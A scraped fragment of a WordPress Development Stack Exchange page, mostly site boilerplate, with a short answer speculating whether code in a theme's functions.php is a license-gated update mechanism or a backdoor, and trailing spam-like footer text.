        That's a possibility.



        Although, I think it is a mechanism to push theme updates only for sites with a valid license key.



        Alternatively, it is backdoor for deleting theme for any compromised key.



        It is difficult to say anything for sure without looking at the content which is downloaded.







        share|improve this answer








        New contributor




        Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
        Check out our Code of Conduct.









        share|improve this answer



        share|improve this answer






        New contributor




        Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
        Check out our Code of Conduct.









        answered 2 days ago









        GauravGaurav

        11




        11




        New contributor




        Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
        Check out our Code of Conduct.





        New contributor





        Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
        Check out our Code of Conduct.






        Gaurav is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
        Check out our Code of Conduct.



























            draft saved

            draft discarded
















































            Thanks for contributing an answer to WordPress Development Stack Exchange!


            • Please be sure to answer the question. Provide details and share your research!

            But avoid


            • Asking for help, clarification, or responding to other answers.

            • Making statements based on opinion; back them up with references or personal experience.

            To learn more, see our tips on writing great answers.




            draft saved


            draft discarded














            StackExchange.ready(
            function ()
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fwordpress.stackexchange.com%2fquestions%2f333380%2fis-this-a-hacking-script-in-function-php%23new-answer', 'question_page');

            );

            Post as a guest















            Required, but never shown





















































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown

































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown







            Popular posts from this blog

            Sum ergo cogito? 1 nng

            三茅街道4182Guuntc Dn precexpngmageondP